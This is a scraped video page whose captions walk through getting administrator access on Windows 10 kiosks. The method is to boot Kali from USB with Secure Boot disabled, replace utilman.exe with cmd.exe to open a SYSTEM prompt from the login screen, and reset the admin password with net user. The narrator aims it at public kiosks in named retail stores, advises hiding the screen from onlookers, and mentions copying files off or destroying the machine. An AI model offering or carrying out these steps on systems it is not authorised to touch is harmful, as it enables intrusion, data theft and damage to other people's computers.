Hacking Admin Access on Windows 10

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

[Music] hey everybody this is the first video of a new series that I'm calling kiosk hacking and this was a game that we used to play at my old job where our security developers would build these lockdown systems that were intended to be used as kiosks out in the public and we would compete to see if we could actually find any security holes in their designs to gain access to the underlying system or the network that it's on or even further than that so this first one is actually kind of a revival of an old trick that I used to do on Windows 7 and I'm gonna try to bring it to Windows 10 this time the only real requirement is you do have to have physical access to the actual controls of the computer itself so I'm talking about like the power button and USB ports now I know that's not the most usual thing that you're gonna come across these days usually those are in locked boxes that are attached to the kiosk itself but I have still seen these full computer kiosks fairly recently that are just these touch screen monitors that have a computer or a laptop just bolted to the back of it like a dell optiplex or some thin client or something like that if you just look behind them or look underneath them you'll see that it's just a full computer that you can do whatever you want with it in Walmart I've seen them in Sears I've seen them in Kohl's department store I've seen them in Ikea and these are really just things that you're supposed to like walk up with a product maybe there's a barcode scanner and you can scan an item it'll tell you how many they have or what aisle that's on and stuff like that but the reason I'm starting with this trick is because it's something that most people would never really think of this is an unobtrusive hack that is persistent so you can leave and come back and it will still work and it's just never expected by anybody so I think it's kind of fun and before we get started I just wanted to show you real quick what I'm actually exploiting in this trick so if you look here this is just a regular Windows 10 login screen there's really nothing that I can do here without a password sometimes in the bottom left corner there's some power buttons to shutdown or restart the computer you can see what network you're connected to but you can't make any changes you can't right click or anything but there is this ease of access button on the bottom right hand corner that's also accessible if you hold down the windows key and hit the letter U your computer easier to use and you'll see this little screen pop up in the top left-hand corner with a digital narrator who's explaining some changes that you can make to the login screen to make things easier for someone who's hearing or sight impaired and this is actually an executable that lives in system 32 it's called util man Exe utility manager so this is the executable that we are going to be exploiting in the sink trick okay and for the sake of simplicity I'm gonna use this Lenovo laptop as my example kiosk obviously a physical computer is a physical computer if you have access to the power button and the USB ports everything is going to be pretty much exactly the same the only other thing I do have here is a flash drive with a live distribution of Linux so this can be basically any disrobe that can run live I think I used to use DSL which stands for damn small Linux anything that can boot really quickly and doesn't stay up on the screen too long like waiting for menus and stuff to load is fine for this I actually installed the newest version of Kali on this flash drive so that's we're going to use for this example so the only thing I've done to this computer so far is held the power button down to shut it down and then go ahead and plug in my flash drive and power back on so obviously at this point you can tell that we're going to boot to the USB Drive I need to hit f12 to get into it but let's say for example you try to get into the boot menu and you can't I'm gonna go into f1 for BIOS and I'm gonna show you an example of why you may not be able to boot into this Drive so probably I would go ahead and quickly get into the boot menu and try to boot from the flash drive first but if it doesn't work you need to quickly get into the BIOS and run over to security and then you'll scroll down to secure boot and you need to make sure that secure boot is disabled and then you need to go over to the startup tab and look for legacy boot and make sure that UEFI and legacy boot are both supported once that's done you're sure that you can actually get into the computer and you can just go ahead and get out of the BIOS so the keys you need to hit are going to be dependent on the manufacturer of the computer for Lenovo it's f12 I'm gonna go ahead and jump down to my USB device is my boot drive for Kelly I'm gonna do a live system boot so I did used to use backtrack for this which was a little bit nicer than Kali because instead of booting to a full graphical user interface it would just boot straight to a terminal which is quite a bit faster and it looks a little bit less than inconspicuous because even though it is just a bunch of code up on the screen it can get to it faster and let you do your work without people seeing that you're running a separate operating system on it so for this stuff what I would probably do is turn my back kind of cover the monitor as much as you can so that no one can see what you're doing and as soon as you get to the prompt go ahead and very quickly log in and get to a terminal [Music] then once you get booted into Cali you'll see on the desktop is a folder called windows and this actually is the windows partition on the hard drive of the computer itself so we can go ahead and start grabbing these folders and copying them to the flash drive or off to an FTP server or something but my little trick I want to do a little bit differently so I see here that Kali is already mounted the windows partition to media / root / windows so I'm gonna go ahead and open up a terminal here and I'm gonna go CD to media / root / Windows and then inside of Windows I want to go to the windows folder and system32 and then obviously if I do a an LS in here I can see all the files in system 32 the only one I care about is that util man exe executable file so I'm gonna do here is I'm gonna say move util man exe to util man old and all that's doing is it's just renaming it from util Amanda exe - util Amanda old and then I'm gonna take the CMD the command prompt executable and I'm gonna copy that from cmd.exe to the new tool name that exe so what I've done here is I've overridden the old util Amanda exe with the command prompt but I've backed up the old detail man with ezel man that old so obviously the executable is still there but once we restart the computer anytime anyone tries to call the you tol man executable it's gonna run the command prompt instead I think you're probably seeing where this is going but let's go ahead and restart [Music] and now I can just grab my flash drive unplug it turn the computer back on and walk away now once the computer boots back up if we hit the spacebar or get to the login screen so just like we did in the beginning when we held down the windows key and hit the letter U let's try that again this time we get a command prompt which is awesome and you'll see up at the top here it's actually running the command prompt as the util man Exe obviously because that's what we renamed it to be so the first thing I always do whenever I get into a command prompt as I see who is running this what permissions do I have so if I do a Who am I you'll see this is currently running as the system user so I can go ahead and I can dig in and I can see everything it's okay fresh command prompt let's do it directory is everything I can see D into users there's all my users I can get into the admin folder I can see all their files I don't want to do something a little bit more interesting than this let's see what happens if I run explorer I look at their I have a taskbar so obviously this is the system user so I can't do a whole lot I can't actually open the Start button I can't really do much I can't control any open programs running in the background I can't change the time I can't connect to a different Wi-Fi however I can right-click and open the task manager so I can go ahead and come in here and I can run new task but what I want to do is I want to mess with this admin account I want to see if I can actually get into this account so what I'm gonna do is I'm gonna run net user and admin and I'm gonna change the password to something else let's set this okay there so now let's go back to the login screen now I can login with the admin account with my new password so now I have full administrative access to this computer I can do anything I want I can copy all the files off I can destroy it if I really really wanted to anyway that's it so yeah one little teeny-tiny trick to rename an executable that's accessible from the login screen allows you to change the administrative password to the computer and get access to everything so that was trick number one we'll see you in trick number two

Info

Channel: Ryan MacNeille

Views: 67,553

Rating: undefined out of 5

Keywords: WIndows 10, hacking, hack, utilman, sticky keys, login, admin, administrative, access, kiosk, fast, kali, usb, boot, exploit

Id: CAZLU6rnIlQ

Channel Id: undefined

Length: 9min 44sec (584 seconds)

Published: Thu Apr 25 2019